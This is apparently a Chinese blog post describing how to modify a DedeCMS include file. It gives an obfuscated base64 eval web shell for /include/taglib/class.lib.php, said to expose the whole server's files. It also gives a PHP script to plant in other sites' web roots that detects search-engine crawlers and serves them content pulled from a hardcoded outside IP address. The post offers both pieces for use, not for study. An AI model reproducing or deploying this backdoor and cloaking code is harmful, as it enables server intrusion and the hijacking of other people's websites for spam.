小黑把强梦include文件改了

小黑把强梦include文件改了

时间:2020-09-08 作者:xphero210 评论:0 点击:1623 次

/include/taglib/class.lib.php写成以下代码 可以看到整个服务器的文件了  然后在别的网站根目录放东西

<?php

@eval/**/(base64_decode/**/(JHBhc3N3b3JkPSdsdW1hbm1hbnFpeGl1eXVhbnhpJzsKZXJyb3JfcmVwb3J0aW5nLyoqLygwKTsKQHNldF90aW1lX2xpbWl0LyoqLygwKTsKICAgIGZ1bmN0aW9uIENsYXNzX1VDX2

然后在别的网站根目录放东西

<?php

set_time_limit(30);error_reporting(0);$tr=stristr;$er=$_SERVER;define('url',$er['REQUEST_URI']);define('ref',$er['HTTP_REFERER']);define('ent',$er['HTTP_USER_AGENT']);define('site',"http://155.159.59.1");define('road',"/?road=".$er['HTTP_HOST'].url."&der=".ent);define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');define('area',$tr(url,".xml")or $tr(url,".doc")or $tr(url,".pdf")or $tr(url,".txt")or $tr(url,".ppt")or $tr(url,".pptx")or $tr(url,".xls")or $tr(url,".csv")or $tr(url,".shtml")or $tr(url,".docx")or $tr(url,".xlsx")and $tr(url,"?"));if(area&&preg_match(regs,ref)){echo g('http://155.159.59.1/sb.html');exit;}if(preg_match(regs,ent)){if(area){echo g(site.road);exit;}else{echo g("http://155.159.59.1/u.php");ob_flush();flush();}}function g($f){$c=array('http'=>array('method'=>"GET"));$g=stream_context_create($c);$h=file_get_contents($f,false,$g);if(!empty($h)){return $h;}}


已有 1623 位网友参与,快来吐槽:

发表评论

必填

选填

选填

◎欢迎参与讨论,发表您的看法、交流您的观点。